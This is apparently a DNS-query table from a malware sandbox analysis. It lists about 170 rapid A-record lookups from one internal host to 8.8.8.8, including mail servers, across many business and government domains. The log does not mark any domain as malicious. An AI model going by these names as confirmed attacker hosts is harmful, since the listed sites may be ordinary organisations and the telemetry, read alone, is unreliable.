                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.140146017 CEST192.168.2.48.8.8.80xd7fdStandard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.148530960 CEST192.168.2.48.8.8.80x4d5fStandard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.154867887 CEST192.168.2.48.8.8.80x4d87Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.173337936 CEST192.168.2.48.8.8.80x1de3Standard query (0)insia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.184504986 CEST192.168.2.48.8.8.80x207bStandard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.190848112 CEST192.168.2.48.8.8.80x92beStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.197321892 CEST192.168.2.48.8.8.80x4234Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.205221891 CEST192.168.2.48.8.8.80x72a7Standard query (0)sgk.home.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.343839884 CEST192.168.2.48.8.8.80xb61eStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.377583027 CEST192.168.2.48.8.8.80x886fStandard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.386025906 CEST192.168.2.48.8.8.80x51f3Standard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.387079000 CEST192.168.2.48.8.8.80x330fStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.388933897 CEST192.168.2.48.8.8.80xa92fStandard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.388933897 CEST192.168.2.48.8.8.80xaef1Standard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.391992092 CEST192.168.2.48.8.8.80x427eStandard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.398880005 CEST192.168.2.48.8.8.80x66aStandard query (0)cnti.krsn.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.453285933 CEST192.168.2.48.8.8.80x3526Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.505528927 CEST192.168.2.48.8.8.80x464dStandard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.510901928 CEST192.168.2.48.8.8.80xb7bbStandard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.538983107 CEST192.168.2.48.8.8.80xc046Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.543530941 CEST192.168.2.48.8.8.80xb5a1Standard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.543530941 CEST192.168.2.48.8.8.80x62a7Standard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.543945074 CEST192.168.2.48.8.8.80x5b25Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.566970110 CEST192.168.2.48.8.8.80xa5dStandard query (0)www.11tochi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.573604107 CEST192.168.2.48.8.8.80xe2b7Standard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.576924086 CEST192.168.2.48.8.8.80xc1d8Standard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.587572098 CEST192.168.2.48.8.8.80xdb29Standard query (0)www.spanesi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.603811979 CEST192.168.2.48.8.8.80x3c0fStandard query (0)www.muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.603812933 CEST192.168.2.48.8.8.80x88f1Standard query (0)impexnc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.624278069 CEST192.168.2.48.8.8.80x7395Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.682115078 CEST192.168.2.48.8.8.80xe625Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.707829952 CEST192.168.2.48.8.8.80x831cStandard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.714056015 CEST192.168.2.48.8.8.80x8c66Standard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.743505955 CEST192.168.2.48.8.8.80xec54Standard query (0)adventist.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.777499914 CEST192.168.2.48.8.8.80x8129Standard query (0)smtp.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.798228025 CEST192.168.2.48.8.8.80x1ec2Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.803425074 CEST192.168.2.48.8.8.80xfbc8Standard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.803770065 CEST192.168.2.48.8.8.80x7da0Standard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.830868006 CEST192.168.2.48.8.8.80x9372Standard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.850668907 CEST192.168.2.48.8.8.80xc0e8Standard query (0)noblesse.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.864300966 CEST192.168.2.48.8.8.80x20fdStandard query (0)www.tc17.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.904500961 CEST192.168.2.48.8.8.80xdd01Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.904984951 CEST192.168.2.48.8.8.80xa67dStandard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.905368090 CEST192.168.2.48.8.8.80x816eStandard query (0)magicomm.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.905628920 CEST192.168.2.48.8.8.80x2759Standard query (0)softizer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.906173944 CEST192.168.2.48.8.8.80x3cdbStandard query (0)apcotex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.908588886 CEST192.168.2.48.8.8.80x1850Standard query (0)dbnet.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.941056013 CEST192.168.2.48.8.8.80xf8aaStandard query (0)dhh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.967971087 CEST192.168.2.48.8.8.80x679aStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.014314890 CEST192.168.2.48.8.8.80xacccStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.021617889 CEST192.168.2.48.8.8.80x7317Standard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.046344995 CEST192.168.2.48.8.8.80x596dStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.048280954 CEST192.168.2.48.8.8.80x1273Standard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.049838066 CEST192.168.2.48.8.8.80xd585Standard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.053322077 CEST192.168.2.48.8.8.80x61d2Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.055186033 CEST192.168.2.48.8.8.80x29acStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.062952042 CEST192.168.2.48.8.8.80x1bc8Standard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.083287001 CEST192.168.2.48.8.8.80x9db0Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.092279911 CEST192.168.2.48.8.8.80x105Standard query (0)hyab.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.108515978 CEST192.168.2.48.8.8.80x94d0Standard query (0)softizer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.130018950 CEST192.168.2.48.8.8.80xec80Standard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.149132967 CEST192.168.2.48.8.8.80x8b82Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.239758968 CEST192.168.2.48.8.8.80x7b1cStandard query (0)diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.374315977 CEST192.168.2.48.8.8.80x70bcStandard query (0)amic.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.389055967 CEST192.168.2.48.8.8.80x7d69Standard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.389117002 CEST192.168.2.48.8.8.80x5af0Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.389220953 CEST192.168.2.48.8.8.80x94c3Standard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.393446922 CEST192.168.2.48.8.8.80x8726Standard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.424666882 CEST192.168.2.48.8.8.80xdbebStandard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.441941977 CEST192.168.2.48.8.8.80xdd28Standard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.443591118 CEST192.168.2.48.8.8.80x1605Standard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.445071936 CEST192.168.2.48.8.8.80x79beStandard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.445363998 CEST192.168.2.48.8.8.80x15f7Standard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.466629028 CEST192.168.2.48.8.8.80xcfb7Standard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.496239901 CEST192.168.2.48.8.8.80x2be1Standard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.503753901 CEST192.168.2.48.8.8.80x861eStandard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.503825903 CEST192.168.2.48.8.8.80x47b8Standard query (0)orlyhotel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.544121981 CEST192.168.2.48.8.8.80xe354Standard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.554341078 CEST192.168.2.48.8.8.80xf726Standard query (0)atbauk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.556385994 CEST192.168.2.48.8.8.80xf1b9Standard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.557894945 CEST192.168.2.48.8.8.80x8aadStandard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.573102951 CEST192.168.2.48.8.8.80xb8e9Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.576545954 CEST192.168.2.48.8.8.80xa7cfStandard query (0)mackusick.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.598438978 CEST192.168.2.48.8.8.80xee19Standard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.603518009 CEST192.168.2.48.8.8.80xb749Standard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.604573965 CEST192.168.2.48.8.8.80xb78aStandard query (0)flamingorecordings.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.621237993 CEST192.168.2.48.8.8.80x8a08Standard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.624183893 CEST192.168.2.48.8.8.80x1be7Standard query (0)hubbikes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.662123919 CEST192.168.2.48.8.8.80x85e4Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.713452101 CEST192.168.2.48.8.8.80x683eStandard query (0)ldh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.731456041 CEST192.168.2.48.8.8.80xc3f4Standard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.738126040 CEST192.168.2.48.8.8.80xd691Standard query (0)mackusick.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.818994999 CEST192.168.2.48.8.8.80x391Standard query (0)techtrans.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.836427927 CEST192.168.2.48.8.8.80x5565Standard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.850500107 CEST192.168.2.48.8.8.80x76dfStandard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.852453947 CEST192.168.2.48.8.8.80x746Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.852453947 CEST192.168.2.48.8.8.80x3251Standard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.853102922 CEST192.168.2.48.8.8.80xe1c9Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.853202105 CEST192.168.2.48.8.8.80x9b50Standard query (0)a-domani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.853202105 CEST192.168.2.48.8.8.80xf8c8Standard query (0)dyag-eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.871732950 CEST192.168.2.48.8.8.80x79e9Standard query (0)strazynski.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.899367094 CEST192.168.2.48.8.8.80x51c7Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.906763077 CEST192.168.2.48.8.8.80x5e0aStandard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.933232069 CEST192.168.2.48.8.8.80x1ddfStandard query (0)www.diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.939023972 CEST192.168.2.48.8.8.80xd2fStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.948286057 CEST192.168.2.48.8.8.80xf3dbStandard query (0)t-mould.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.998454094 CEST192.168.2.48.8.8.80x5b5fStandard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.056227922 CEST192.168.2.48.8.8.80x6c6cStandard query (0)nels.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.064910889 CEST192.168.2.48.8.8.80x9fddStandard query (0)snf.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.147438049 CEST192.168.2.48.8.8.80xa5abStandard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.181967974 CEST192.168.2.48.8.8.80xd6e0Standard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.219177008 CEST192.168.2.48.8.8.80x4adbStandard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.280071020 CEST192.168.2.48.8.8.80x2163Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.292309046 CEST192.168.2.48.8.8.80xa2b3Standard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.294954062 CEST192.168.2.48.8.8.80xb281Standard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.438061953 CEST192.168.2.48.8.8.80xbe60Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.483870983 CEST192.168.2.48.8.8.80x515dStandard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.540633917 CEST192.168.2.48.8.8.80xb79Standard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.541815042 CEST192.168.2.48.8.8.80x3ccaStandard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.556324959 CEST192.168.2.48.8.8.80xc001Standard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.604522943 CEST192.168.2.48.8.8.80x4df8Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.617331982 CEST192.168.2.48.8.8.80x7a10Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.632447958 CEST192.168.2.48.8.8.80x5098Standard query (0)rast.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.660737991 CEST192.168.2.48.8.8.80xa54cStandard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.661780119 CEST192.168.2.48.8.8.80xcd5dStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.720458031 CEST192.168.2.48.8.8.80x524eStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.747076035 CEST192.168.2.48.8.8.80xf62fStandard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.786708117 CEST192.168.2.48.8.8.80x9fabStandard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.794179916 CEST192.168.2.48.8.8.80x7dbdStandard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.832027912 CEST192.168.2.48.8.8.80xe756Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.882671118 CEST192.168.2.48.8.8.80x1288Standard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.944967985 CEST192.168.2.48.8.8.80xe796Standard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.946438074 CEST192.168.2.48.8.8.80x66a3Standard query (0)www.pb-games.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.967715979 CEST192.168.2.48.8.8.80xae50Standard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.975579023 CEST192.168.2.48.8.8.80x72c0Standard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.982635975 CEST192.168.2.48.8.8.80xd2fStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.990776062 CEST192.168.2.48.8.8.80xcdd4Standard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.992763996 CEST192.168.2.48.8.8.80x6fbcStandard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.020654917 CEST192.168.2.48.8.8.80x31d7Standard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.084140062 CEST192.168.2.48.8.8.80x746Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.192054033 CEST192.168.2.48.8.8.80x9570Standard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.222148895 CEST192.168.2.48.8.8.80xc1fStandard query (0)bigzz.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.232259989 CEST192.168.2.48.8.8.80x29e8Standard query (0)hes.ptA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.302238941 CEST192.168.2.48.8.8.80x3416Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.339170933 CEST192.168.2.48.8.8.80xd1c5Standard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.375341892 CEST192.168.2.48.8.8.80xfafaStandard query (0)akr.co.idA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.510333061 CEST192.168.2.48.8.8.80x86ccStandard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.559390068 CEST192.168.2.48.8.8.80xc5cStandard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.569263935 CEST192.168.2.48.8.8.80xf742Standard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.571127892 CEST192.168.2.48.8.8.80xfcbcStandard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.577258110 CEST192.168.2.48.8.8.80xdf49Standard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.581593037 CEST192.168.2.48.8.8.80x3b57Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.592606068 CEST192.168.2.48.8.8.80x6c14Standard query (0)rast.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.595746040 CEST192.168.2.48.8.8.80x4df8Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.596736908 CEST192.168.2.48.8.8.80x72a0Standard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.606525898 CEST192.168.2.48.8.8.80x7a5eStandard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.620671988 CEST192.168.2.48.8.8.80xf5b5Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.659699917 CEST192.168.2.48.8.8.80x2b7cStandard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.723826885 CEST192.168.2.48.8.8.80xe885Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.787239075 CEST192.168.2.48.8.8.80xd514Standard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.811460972 CEST192.168.2.48.8.8.80xdec1Standard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.820044994 CEST192.168.2.48.8.8.80xd6abStandard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.822968960 CEST192.168.2.48.8.8.80xe581Standard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.979391098 CEST192.168.2.48.8.8.80xa66dStandard query (0)forbin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.036456108 CEST192.168.2.48.8.8.80xd2fStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.128782988 CEST192.168.2.48.8.8.80x4e6bStandard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.128993988 CEST192.168.2.48.8.8.80x746Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.151796103 CEST192.168.2.48.8.8.80xd28Standard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.154427052 CEST192.168.2.48.8.8.80xfaeaStandard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.178596020 CEST192.168.2.48.8.8.80x9219Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.201502085 CEST192.168.2.48.8.8.80x4a3aStandard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.263643026 CEST192.168.2.48.8.8.80xee33Standard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.287437916 CEST192.168.2.48.8.8.80xa8e3Standard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.313206911 CEST192.168.2.48.8.8.80xb11Standard query (0)nts-web.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.451562881 CEST192.168.2.48.8.8.80x8614Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.526304007 CEST192.168.2.48.8.8.80xbd7fStandard query (0)www.synetik.netA (IP address)IN (0x0001)false
